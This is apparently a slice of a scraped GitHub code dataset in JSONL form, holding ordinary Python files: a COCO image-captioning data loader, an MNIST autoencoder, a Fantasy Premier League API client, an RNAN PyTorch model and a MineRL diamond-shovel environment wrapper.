"line_number": 118, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 118, "usage_type": "attribute"}, {"api_name": "numpy.random.random_integers", "line_number": 119, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 119, "usage_type": "attribute"}, {"api_name": "numpy.random.random_integers", "line_number": 120, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 120, "usage_type": "attribute"}, {"api_name": "numpy.random.random_integers", "line_number": 121, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 121, "usage_type": "attribute"}]}
{"seq_id": "34235483249", "text": "import tensorflow as tf\n\nimport matplotlib.pyplot as plt\n\nimport collections\nimport random\nimport numpy as np\nimport os\nimport time\nimport json\nfrom PIL import Image\n\n\nclass Dataset:\n    def __init__(self, annotation_file=None, annotations=None, PATH=None):\n        self.annotation_file = annotation_file\n        self.PATH = PATH\n        self.annotations = annotations\n\n    def get_data(self):\n        annotation_folder = \"/annotations/\"\n        if not os.path.exists(os.path.abspath(\".\") + annotation_folder):\n            annotation_zip = tf.keras.utils.get_file(\n                \"captions.zip\",\n                cache_subdir=os.path.abspath(\".\"),\n                origin=\"http://images.cocodataset.org/annotations/annotations_trainval2014.zip\",\n                extract=True,\n            )\n            self.annotation_file = (\n                os.path.dirname(annotation_zip) + \"/annotations/captions_train2014.json\"\n            )\n            os.remove(annotation_zip)\n\n        image_folder = \"/train2014/\"\n        if not os.path.exists(os.path.abspath(\".\") + image_folder):\n            image_zip = tf.keras.utils.get_file(\n                \"train2014.zip\",\n                cache_subdir=os.path.abspath(\".\"),\n                origin=\"http://images.cocodataset.org/zips/train2014.zip\",\n                extract=True,\n            )\n            self.PATH = os.path.dirname(image_zip) + image_folder\n            os.remove(image_zip)\n        else:\n            self.PATH = os.path.abspath(\".\") + image_folder\n\n    def group_data(self):\n        self.get_data()\n        with open(self.annotation_file, \"r\") as f:\n            self.annotations = json.load(f)\n        image_path_to_caption = collections.defaultdict(list)\n        for val in self.annotations[\"annotations\"]:\n            caption = f\"<start> {val['caption']} <end>\"\n            image_path = self.PATH + \"COCO_train2014_\" + \"%012d.jpg\" % (val[\"image_id\"])\n            image_path_to_caption[image_path].append(caption)\n        image_paths = list(image_path_to_caption.keys())\n        random.shuffle(image_paths)\n        train_image_paths = image_paths[:6000]\n        print(\"Training samples:\", len(train_image_paths))\n        return image_path_to_caption, train_image_paths\n\n    def fetch_data(self):\n        image_path_to_caption, train_image_paths = self.group_data()\n        train_captions = []\n        img_name_vector = []\n\n        for image_path in train_image_paths:\n            caption_list = image_path_to_caption[image_path]\n            train_captions.extend(caption_list)\n            img_name_vector.extend([image_path] * len(caption_list))\n\n        return train_captions, img_name_vector\n\n\nif __name__ == \"__main__\":\n    dataset = Dataset()\n    train_captions, img_name_vector = dataset.fetch_data()\n    print(train_captions[0])\n    Image.open(img_name_vector[0])\n", "repo_name": "thisishardik/neural-image-captioning", "sub_path": "dataset/train_loader.py", "file_name": "train_loader.py", "file_ext": "py", "file_size_in_byte": 2821, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "os.path.exists", "line_number": 22, "usage_type": "call"}, {"api_name": "os.path", "line_number": 22, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 22, "usage_type": "call"}, {"api_name": "tensorflow.keras.utils.get_file", "line_number": 23, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 23, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 25, "usage_type": "call"}, {"api_name": "os.path", "line_number": 25, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 30, "usage_type": "call"}, {"api_name": "os.path", "line_number": 30, "usage_type": "attribute"}, {"api_name": "os.remove", "line_number": 32, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 35, "usage_type": "call"}, {"api_name": "os.path", "line_number": 35, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 35, "usage_type": "call"}, {"api_name": "tensorflow.keras.utils.get_file", "line_number": 36, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 36, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 38, "usage_type": "call"}, {"api_name": "os.path", "line_number": 38, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 42, "usage_type": "call"}, {"api_name": "os.path", "line_number": 42, "usage_type": "attribute"}, {"api_name": "os.remove", "line_number": 43, "usage_type": "call"}, {"api_name": "os.path.abspath", "line_number": 45, "usage_type": "call"}, {"api_name": "os.path", "line_number": 45, "usage_type": "attribute"}, {"api_name": "json.load", "line_number": 50, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 51, "usage_type": "call"}, {"api_name": "random.shuffle", "line_number": 57, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 79, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 79, "usage_type": "name"}]} {"seq_id": "12356045626", "text": "from __future__ import division, print_function, absolute_import\nfrom tensorflow.examples.tutorials.mnist import input_data\nimport tensorflow as tf\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\nmnist = input_data.read_data_sets(r\"C:\\Users\\tianx\\PycharmProjects\\TensorFlow\\datasets\\data\", one_hot=True)\n\n# The mnist dataset contains 55000 training samples; each sample is a one-dimensional array of length 784, representing a 28 * 28 image. There are likewise 10000 test samples.\n# mnist.train.images.shape: (55000, 784)\n# mnist.test.images.shape: (10000, 784)\n# mnist.validation: \n# print(dir(mnist.train)): 'epochs_completed', 'images', 'labels', 'next_batch', 'num_examples'.\n# print(mnist.train.labels[0]): [0. 0. 0. 0. 0. 0. 0. 1. 0. 0.]\n# print(mnist.train.labels.shape): (55000, 10)\n# mnist.train.next_batch(10) iteratively yields (X, y) arrays of training samples\n\n\nX = tf.placeholder(dtype=tf.float32, shape=(None,784))\n\nw1 = tf.Variable(initial_value=tf.random_normal([784, 256]), dtype=tf.float32)\nb1 = tf.Variable(initial_value=tf.random_normal([256]), dtype=tf.float32)\n\nw2 = tf.Variable(initial_value=tf.random_normal([256, 128]), dtype=tf.float32)\nb2 = tf.Variable(initial_value=tf.random_normal([128]), dtype=tf.float32)\n\nw3 = tf.Variable(initial_value=tf.random_normal([128,256]), dtype=tf.float32)\nb3 = tf.Variable(initial_value=tf.random_normal([256]), dtype=tf.float32)\n\nw4 = tf.Variable(initial_value=tf.random_normal([256,784]), dtype=tf.float32)\nb4 = tf.Variable(initial_value=tf.random_normal([784]), dtype=tf.float32)\n\ndef encode_op(X):\n    X1 = tf.nn.sigmoid(tf.add(tf.matmul(X,w1), b1))\n    X2 = tf.nn.sigmoid(tf.add(tf.matmul(X1,w2), b2))\n    return X2\n\n\ndef decode_op(X2):\n    X3 = tf.nn.sigmoid(tf.add(tf.matmul(X2,w3), b3))\n    X4 = tf.nn.sigmoid(tf.add(tf.matmul(X3,w4), b4))\n    return X4\n\nencode_op = encode_op(X)\ndecode_op = decode_op(encode_op)\ny_predictions = decode_op\ny_true = X\n\n# Compute the mean squared error\nloss = tf.reduce_mean(tf.pow(y_true - y_predictions, 2))\n\noptimizer = tf.train.RMSPropOptimizer(0.001).minimize(loss)\n\ninit = tf.global_variables_initializer()\n\nsess = tf.Session()\n\nsess.run(init)\n\nfor i in range(1, 20000+1):\n    batch_x, _ = mnist.train.next_batch(200)\n\n    _, l = sess.run([optimizer, loss], feed_dict={X: batch_x})\n    if i % 200 == 0 or i == 1:\n        print('Step %i: Minibatch Loss: %f' % (i, l))\n\nn = 4\ncanvas_orig = np.empty((28 * n, 28 * n))\ncanvas_recon = np.empty((28 * n, 28 * n))\nfor i in range(n):\n    # MNIST test set\n    batch_x, _ = mnist.test.next_batch(n)\n    # Encode and decode the digit image\n    g = sess.run(decode_op, feed_dict={X: batch_x})\n\n    # Display original images\n    for j in range(n):\n        # Draw the generated digits\n        canvas_orig[i * 28:(i + 1) * 28, j * 28:(j + 1) * 28] = batch_x[j].reshape([28, 28])\n    # Display reconstructed images\n    for j in range(n):\n        # Draw the generated digits\n        canvas_recon[i * 28:(i + 1) * 28, j * 28:(j + 1) * 28] = g[j].reshape([28, 28])\n\nprint(\"Original Images\")\nplt.figure(figsize=(n, n))\nplt.imshow(canvas_orig, origin=\"upper\", cmap=\"gray\")\nplt.show()\n\nprint(\"Reconstructed Images\")\nplt.figure(figsize=(n, n))\nplt.imshow(canvas_recon, origin=\"upper\", cmap=\"gray\")\nplt.show()\n\n\n\n\n\n\n\n\n", "repo_name": "tianxing1994/TensorFlow", "sub_path": "神经网络练习/自动编码器/auto encoder.py", "file_name": "auto encoder.py", "file_ext": "py", "file_size_in_byte": 3292, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "tensorflow.examples.tutorials.mnist.input_data.read_data_sets", "line_number": 8, "usage_type": "call"}, {"api_name": "tensorflow.examples.tutorials.mnist.input_data", "line_number": 8, "usage_type": "name"}, {"api_name": "tensorflow.placeholder", "line_number": 20, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 20, "usage_type": "attribute"}, {"api_name": "tensorflow.Variable", "line_number": 22, "usage_type": "call"}, {"api_name": "tensorflow.random_normal", "line_number": 22, 
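The auto encoder.py record above builds a 784-256-128-256-784 sigmoid autoencoder with the TF1 graph API (`tf.placeholder`, `tf.Session`). For comparison, the same stack in the Keras API — a sketch under the assumption of TensorFlow 2, not code from that repository:

```python
# Keras sketch of the same encoder/decoder stack; layer sizes mirror w1..w4.
import tensorflow as tf

inputs = tf.keras.Input(shape=(784,))
h = tf.keras.layers.Dense(256, activation="sigmoid")(inputs)
h = tf.keras.layers.Dense(128, activation="sigmoid")(h)      # bottleneck
h = tf.keras.layers.Dense(256, activation="sigmoid")(h)
outputs = tf.keras.layers.Dense(784, activation="sigmoid")(h)

autoencoder = tf.keras.Model(inputs, outputs)
autoencoder.compile(optimizer=tf.keras.optimizers.RMSprop(0.001), loss="mse")
autoencoder.summary()
```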
"usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 22, "usage_type": "attribute"}, {"api_name": "tensorflow.Variable", "line_number": 23, "usage_type": "call"}, {"api_name": "tensorflow.random_normal", "line_number": 23, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 23, "usage_type": "attribute"}, {"api_name": "tensorflow.Variable", "line_number": 25, "usage_type": "call"}, {"api_name": "tensorflow.random_normal", "line_number": 25, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 25, "usage_type": "attribute"}, {"api_name": "tensorflow.Variable", "line_number": 26, "usage_type": "call"}, {"api_name": "tensorflow.random_normal", "line_number": 26, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 26, "usage_type": "attribute"}, {"api_name": "tensorflow.Variable", "line_number": 28, "usage_type": "call"}, {"api_name": "tensorflow.random_normal", "line_number": 28, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 28, "usage_type": "attribute"}, {"api_name": "tensorflow.Variable", "line_number": 29, "usage_type": "call"}, {"api_name": "tensorflow.random_normal", "line_number": 29, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 29, "usage_type": "attribute"}, {"api_name": "tensorflow.Variable", "line_number": 31, "usage_type": "call"}, {"api_name": "tensorflow.random_normal", "line_number": 31, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 31, "usage_type": "attribute"}, {"api_name": "tensorflow.Variable", "line_number": 32, "usage_type": "call"}, {"api_name": "tensorflow.random_normal", "line_number": 32, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 32, "usage_type": "attribute"}, {"api_name": "tensorflow.nn.sigmoid", "line_number": 35, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 35, "usage_type": "attribute"}, {"api_name": "tensorflow.add", "line_number": 35, "usage_type": "call"}, {"api_name": "tensorflow.matmul", "line_number": 35, "usage_type": "call"}, {"api_name": "tensorflow.nn.sigmoid", "line_number": 36, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 36, "usage_type": "attribute"}, {"api_name": "tensorflow.add", "line_number": 36, "usage_type": "call"}, {"api_name": "tensorflow.matmul", "line_number": 36, "usage_type": "call"}, {"api_name": "tensorflow.nn.sigmoid", "line_number": 41, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 41, "usage_type": "attribute"}, {"api_name": "tensorflow.add", "line_number": 41, "usage_type": "call"}, {"api_name": "tensorflow.matmul", "line_number": 41, "usage_type": "call"}, {"api_name": "tensorflow.nn.sigmoid", "line_number": 42, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 42, "usage_type": "attribute"}, {"api_name": "tensorflow.add", "line_number": 42, "usage_type": "call"}, {"api_name": "tensorflow.matmul", "line_number": 42, "usage_type": "call"}, {"api_name": "tensorflow.reduce_mean", "line_number": 51, "usage_type": "call"}, {"api_name": "tensorflow.pow", "line_number": 51, "usage_type": "call"}, {"api_name": "tensorflow.train.RMSPropOptimizer", "line_number": 53, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 53, "usage_type": "attribute"}, {"api_name": "tensorflow.global_variables_initializer", "line_number": 55, "usage_type": "call"}, {"api_name": "tensorflow.Session", "line_number": 57, "usage_type": "call"}, {"api_name": 
"numpy.empty", "line_number": 69, "usage_type": "call"}, {"api_name": "numpy.empty", "line_number": 70, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 87, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 87, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 88, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 88, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 89, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 89, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 92, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 92, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 93, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 93, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 94, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 94, "usage_type": "name"}]} +{"seq_id": "33649601339", "text": "import requests\nimport json\nfrom collections import defaultdict\n\nclass FPL_Engine:\n def __init__(self, credentials):\n self.credentials = credentials\n self.teams = self.get_teams()\n self.fixtures = self.get_fixtures()\n self.players = self.get_players()\n self.my_data = self.manager_fpl_data()\n self.data = {}\n self.element_types = self.get_element_types()\n self.starting_lineup, self.bench = self.build_team()\n self.bank = self.my_data['transfers']['bank']\n\n def get_fixtures(self):\n url = self.credentials[\"fixtures_url\"]\n r = requests.get(url)\n json = r.json()\n return json\n\n def get_teams(self):\n url = self.credentials[\"teams_url\"]\n r = requests.get(url)\n json = r.json()\n teams = json['teams']\n self.teams = teams\n return teams\n\n def get_players(self):\n url = self.credentials[\"players_url\"]\n r = requests.get(url)\n json = r.json()\n players = json['elements']\n players_refactor = {}\n for card in players:\n players_refactor[card['id']] = {i:card[i] for i in card if i!='id'}\n\n return players_refactor\n\n\n return players\n\n def get_element_types(self):\n url = self.credentials[\"players_url\"]\n r = requests.get(url)\n json = r.json()\n types = json['element_types']\n types_refactor = {}\n for card in types:\n types_refactor[card['id']] = {i:card[i] for i in card if i!='id'}\n return types_refactor\n\n def get_detailed_player_info(self, player_id):\n url = f'https://fantasy.premierleague.com/api/element-summary/{player_id}/'\n r = requests.get(url)\n json = r.json()\n history = json['history']\n future = json['fixtures']\n return history, future\n\n def manager_fpl_data(self):\n url = self.credentials[\"login_url\"]\n pwd = self.credentials[\"fantasy_pwd\"]\n email = self.credentials[\"email\"]\n redirect_uri = self.credentials[\"redirect_uri\"]\n app_name = self.credentials[\"app_name\"]\n payload = {\n 'password': pwd,\n 'login': email,\n 'redirect_uri': redirect_uri,\n 'app': app_name\n }\n session = requests.session()\n session.post(url, data=payload)\n my_team_url = self.credentials[\"my_team_url\"] + self.credentials[\"manager_id\"] + '/'\n response = session.get(my_team_url)\n json = response.json()\n return json\n\n def build_team(self):\n starting_lineup = []\n bench = []\n print(self.my_data)\n for card in self.my_data['picks']:\n element = card['element']\n player = self.players[element]\n position = player['element_type']\n position_str = 
self.element_types[position]['singular_name_short']\n first_name = player['first_name']\n last_name = player['second_name']\n selling_price = card['selling_price']\n\n if card['position'] < 12:\n starting_lineup.append([first_name, last_name, position_str, selling_price])\n else:\n bench.append([first_name, last_name, position_str, selling_price])\n\n return starting_lineup, bench\n\n\n\n def display_team(self):\n team = {\"GKP\":\" \", \"DEF\":\" \", \"MID\":\" \", \"FWD\":\" \"}\n for player in self.starting_lineup:\n team[player[2]] += \"-\".join(player[:3]) + \" \"\n print(team[\"GKP\"].center(120), '\\n\\n')\n print(team[\"DEF\"].center(120), '\\n\\n')\n print(team[\"MID\"].center(120), '\\n\\n')\n print(team[\"FWD\"].center(120))\n\n\n\n\n\n\n", "repo_name": "HendoGit/FantasyFootyBot", "sub_path": "project/engine/data_engine.py", "file_name": "data_engine.py", "file_ext": "py", "file_size_in_byte": 3695, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "requests.get", "line_number": 19, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 25, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 33, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 47, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 57, "usage_type": "call"}, {"api_name": "requests.session", "line_number": 75, "usage_type": "call"}]} +{"seq_id": "73203934886", "text": "import torch\nimport numpy as np\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nfrom model.common import conv, ResAttModuleDownUpPlus\n\n\nclass _ResGroup(nn.Module):\n def __init__(self, n_feats, is_nonlocal=False, use_checkpoint=True):\n super().__init__()\n self.block = ResAttModuleDownUpPlus(n_feats, is_nonlocal, use_checkpoint)\n self.tail = conv(n_feats, n_feats)\n\n def forward(self, x):\n return self.tail(self.block(x))\n\n\nclass RNAN(nn.Module):\n def __init__(self, args):\n super().__init__()\n n_resgroup = args.n_resgroups\n n_feats = args.n_feats\n colors = 3\n out_dim = 120 # MoL\n use_checkpoint = args.checkpoint\n self.stages = args.stages\n # input = lr + masked_hr + mask [+ vq_latent]\n self.head = conv(colors * 2 + 1, n_feats)\n self.fuse = conv(n_feats * 2, n_feats, kernel_size=1, bias=False)\n self.stage_embedding = nn.Embedding(args.stages, n_feats)\n self.body_nl_low = _ResGroup(n_feats, is_nonlocal=True, use_checkpoint=use_checkpoint)\n self.body = nn.ModuleList([_ResGroup(n_feats) for _ in range(n_resgroup - 2)])\n self.body_tail = conv(n_feats, n_feats)\n self.body_nl_high = _ResGroup(n_feats, is_nonlocal=True, use_checkpoint=use_checkpoint)\n self.tail = conv(n_feats, out_dim)\n if args.position_encoding:\n self.position_encoding = nn.Parameter(torch.zeros(args.stages, n_feats))\n else:\n self.position_encoding = None\n\n def apply_position_encoding(self, x):\n if self.position_encoding is not None:\n B, _, H, W = x.size()\n num_patches = H * W // self.stages\n position_encoding = self.position_encoding.view(1, -1, 1).expand(B, -1, num_patches)\n kernel_size = int(np.sqrt(self.stages))\n position_encoding = F.fold(position_encoding, kernel_size=kernel_size, output_size=H, stride=kernel_size)\n return x + position_encoding\n return x\n\n def forward(self, x, stage, prev_hidden):\n feats_shallow = self.head(x)\n feats_shallow = self.apply_position_encoding(feats_shallow)\n feats_shallow = self.fuse(torch.cat([feats_shallow, prev_hidden], dim=1))\n feats_shallow = 
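`manager_fpl_data()` in the FPL_Engine record above logs in with `session.post(...)` and then reuses the same session for the authenticated team request, relying on the cookie jar that `requests` keeps per session. The skeleton of that pattern, with placeholder URLs and credentials:

```python
# Session-reuse pattern from manager_fpl_data() above; every URL and
# payload key here is a placeholder, not a real endpoint.
import requests

session = requests.Session()
session.post("https://example.com/login",
             data={"login": "user@example.com", "password": "secret"})
# Cookies set by the login POST ride along on later requests automatically.
response = session.get("https://example.com/api/my-team/12345/")
print(response.status_code)
```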
feats_shallow + self.stage_embedding(stage)[:, :, None, None]\n res = self.body_nl_low(feats_shallow)\n for b in self.body:\n res = b(res)\n res = self.body_tail(res)\n res = self.body_nl_high(res)\n res_main = self.tail(res)\n return res_main, res\n", "repo_name": "hamedhaghighi/UTLC", "sub_path": "RNAN/code/model/rnan.py", "file_name": "rnan.py", "file_ext": "py", "file_size_in_byte": 2575, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "52", "api": [{"api_name": "torch.nn.Module", "line_number": 9, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 9, "usage_type": "name"}, {"api_name": "model.common.ResAttModuleDownUpPlus", "line_number": 12, "usage_type": "call"}, {"api_name": "model.common.conv", "line_number": 13, "usage_type": "call"}, {"api_name": "torch.nn.Module", "line_number": 19, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 19, "usage_type": "name"}, {"api_name": "model.common.conv", "line_number": 29, "usage_type": "call"}, {"api_name": "model.common.conv", "line_number": 30, "usage_type": "call"}, {"api_name": "torch.nn.Embedding", "line_number": 31, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 31, "usage_type": "name"}, {"api_name": "torch.nn.ModuleList", "line_number": 33, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 33, "usage_type": "name"}, {"api_name": "model.common.conv", "line_number": 34, "usage_type": "call"}, {"api_name": "model.common.conv", "line_number": 36, "usage_type": "call"}, {"api_name": "torch.nn.Parameter", "line_number": 38, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 38, "usage_type": "name"}, {"api_name": "torch.zeros", "line_number": 38, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 47, "usage_type": "call"}, {"api_name": "torch.nn.functional.fold", "line_number": 48, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 48, "usage_type": "name"}, {"api_name": "torch.cat", "line_number": 55, "usage_type": "call"}]} +{"seq_id": "8083997363", "text": "import gym\n\nfrom minerl.env import _fake, _singleagent\nfrom minerl.herobraine.env_specs.human_survival_specs import HumanSurvival\nfrom minerl.herobraine.hero.handlers.translation import TranslationHandler\nfrom minerl.herobraine.hero.handler import Handler\nfrom minerl.herobraine.hero import handlers\nfrom minerl.herobraine.hero.mc import ALL_ITEMS\nfrom typing import List\n\nTIMEOUT = 18000\nDIAMOND_ITEMS = [\n [[\"acacia_log\", \"birch_log\", \"dark_oak_log\", \"jungle_log\", \"oak_log\", \"spruce_log\"], 1],\n [[\"acacia_planks\", \"birch_planks\", \"dark_oak_planks\", \"jungle_planks\", \"oak_planks\", \"spruce_planks\"], 2],\n [[\"stick\"], 4],\n [[\"crafting_table\"], 4],\n [[\"wooden_pickaxe\"], 8],\n [[\"cobblestone\"], 16],\n [[\"furnace\"], 32],\n [[\"stone_pickaxe\"], 32],\n [[\"iron_ore\"], 64],\n [[\"iron_ingot\"], 128],\n [[\"iron_pickaxe\"], 256],\n [[\"diamond\"], 1024],\n [[\"diamond_shovel\"], 2048]\n]\n\n\nclass ObtainDiamondShovelWrapper(gym.Wrapper):\n def __init__(self, env):\n super().__init__(env)\n self.rewarded_items = DIAMOND_ITEMS\n self.seen = [0] * len(self.rewarded_items)\n self.timeout = self.env.task.max_episode_steps\n self.num_steps = 0\n self.episode_over = False\n\n def step(self, action: dict):\n if self.episode_over:\n raise RuntimeError(\"Expected `reset` after episode terminated, not `step`.\")\n observation, reward, done, info = super().step(action)\n for i, [item_list, 
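`apply_position_encoding()` in the RNAN record above expands one learned vector per stage into per-patch columns and reassembles them spatially with `F.fold`; this only works when `stages` is a perfect square. A shape check with made-up sizes:

```python
# Shape check for the F.fold trick in apply_position_encoding() above;
# B, C, H, W and stages are illustrative values.
import torch
import torch.nn.functional as F

B, C, H, W = 2, 8, 16, 16
stages = 4
kernel = int(stages ** 0.5)                         # 2x2 blocks
pe = torch.zeros(stages, C)                         # per-stage encoding
cols = pe.view(1, -1, 1).expand(B, -1, H * W // stages)
out = F.fold(cols, output_size=H, kernel_size=kernel, stride=kernel)
print(out.shape)                                    # torch.Size([2, 8, 16, 16])
```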
rew] in enumerate(self.rewarded_items):\n            if not self.seen[i]:\n                for item in item_list:\n                    if observation[\"inventory\"][item] > 0:\n                        if i == len(self.rewarded_items) - 1: # achieved last item in rewarded item list\n                            done = True\n                        reward += rew\n                        self.seen[i] = 1\n                        break\n        self.num_steps += 1\n        if self.num_steps >= self.timeout:\n            done = True\n        self.episode_over = done\n        return observation, reward, done, info\n\n    def reset(self):\n        self.seen = [0] * len(self.rewarded_items)\n        self.episode_over = False\n        obs = super().reset()\n        return obs\n\n\ndef _obtain_diamond_shovel_gym_entrypoint(env_spec, fake=False):\n    \"\"\"Used as entrypoint for `gym.make`.\"\"\"\n    if fake:\n        env = _fake._FakeSingleAgentEnv(env_spec=env_spec)\n    else:\n        env = _singleagent._SingleAgentEnv(env_spec=env_spec)\n\n    env = ObtainDiamondShovelWrapper(env)\n    return env\n\nOBTAIN_DIAMOND_SHOVEL_ENTRY_POINT = \"minerl.herobraine.env_specs.obtain_specs:_obtain_diamond_shovel_gym_entrypoint\"\n\nclass ObtainDiamondShovelEnvSpec(HumanSurvival):\n    r\"\"\"\nIn this environment the agent is required to obtain a diamond shovel.\nThe agent begins in a random starting location on a random survival map\nwithout any items, matching the normal starting conditions for human players in Minecraft.\n\nDuring an episode the agent is rewarded according to the requisite item\nhierarchy needed to obtain a diamond shovel. The rewards for each item are\ngiven here::\n\n    <Item reward=\"1\" type=\"log\" />\n    <Item reward=\"2\" type=\"planks\" />\n    <Item reward=\"4\" type=\"stick\" />\n    <Item reward=\"4\" type=\"crafting_table\" />\n    <Item reward=\"8\" type=\"wooden_pickaxe\" />\n    <Item reward=\"16\" type=\"cobblestone\" />\n    <Item reward=\"32\" type=\"furnace\" />\n    <Item reward=\"32\" type=\"stone_pickaxe\" />\n    <Item reward=\"64\" type=\"iron_ore\" />\n    <Item reward=\"128\" type=\"iron_ingot\" />\n    <Item reward=\"256\" type=\"iron_pickaxe\" />\n    <Item reward=\"1024\" type=\"diamond\" />\n    <Item reward=\"2048\" type=\"diamond_shovel\" />\n\"\"\"\n    def __init__(self):\n        super().__init__(\n            name=\"MineRLObtainDiamondShovel-v0\",\n            max_episode_steps=TIMEOUT,\n            # Hardcoded variables to match the pretrained models\n            fov_range=[70, 70],\n            resolution=[640, 360],\n            gamma_range=[2, 2],\n            guiscale_range=[1, 1],\n            cursor_size_range=[16.0, 16.0]\n        )\n\n    def _entry_point(self, fake: bool) -> str:\n        return OBTAIN_DIAMOND_SHOVEL_ENTRY_POINT\n\n    def create_observables(self) -> List[Handler]:\n        return [\n            handlers.POVObservation(self.resolution),\n            handlers.FlatInventoryObservation(ALL_ITEMS)\n        ]\n\n    def create_monitors(self) -> List[TranslationHandler]:\n        return []\n\n\n", "repo_name": "minerllabs/minerl", "sub_path": "minerl/herobraine/env_specs/obtain_specs.py", "file_name": "obtain_specs.py", "file_ext": "py", "file_size_in_byte": 4427, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 587, "dataset": "github-code", "pt": "52", "api": [{"api_name": "gym.Wrapper", "line_number": 29, "usage_type": "attribute"}, {"api_name": "minerl.env._fake._FakeSingleAgentEnv", "line_number": 67, "usage_type": "call"}, {"api_name": "minerl.env._fake", "line_number": 67, "usage_type": "name"}, {"api_name": "minerl.env._singleagent._SingleAgentEnv", "line_number": 69, "usage_type": "call"}, {"api_name": "minerl.env._singleagent", "line_number": 69, "usage_type": "name"}, {"api_name": "minerl.herobraine.env_specs.human_survival_specs.HumanSurvival", "line_number": 76, "usage_type": "name"}, {"api_name": "minerl.herobraine.hero.handlers.POVObservation", "line_number": 117, "usage_type": "call"}, {"api_name": "minerl.herobraine.hero.handlers", "line_number": 117, "usage_type": "name"}, {"api_name": "minerl.herobraine.hero.handlers.FlatInventoryObservation", "line_number": 118, "usage_type": "call"}, {"api_name": "minerl.herobraine.hero.mc.ALL_ITEMS", "line_number": 118, "usage_type": "argument"}, {"api_name": "minerl.herobraine.hero.handlers", "line_number": 118, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 115, "usage_type": "name"}, {"api_name": 
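`ObtainDiamondShovelWrapper` above is the classic `gym.Wrapper` reward-shaping pattern: intercept `step()`, adjust the reward, optionally force `done`, and reset the bookkeeping in `reset()`. A generic skeleton of the same idea — the bonus rule and the environment name are illustrative stand-ins:

```python
# Generic reward-shaping wrapper in the style of ObtainDiamondShovelWrapper;
# the one-off bonus rule and "CartPole-v1" are illustrative stand-ins.
import gym

class FirstTimeBonus(gym.Wrapper):
    def __init__(self, env):
        super().__init__(env)
        self.bonus_given = False

    def step(self, action):
        obs, reward, done, info = self.env.step(action)
        if not self.bonus_given and reward > 0:
            reward += 10.0            # one-time shaping bonus
            self.bonus_given = True
        return obs, reward, done, info

    def reset(self, **kwargs):
        self.bonus_given = False
        return self.env.reset(**kwargs)

env = FirstTimeBonus(gym.make("CartPole-v1"))
```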
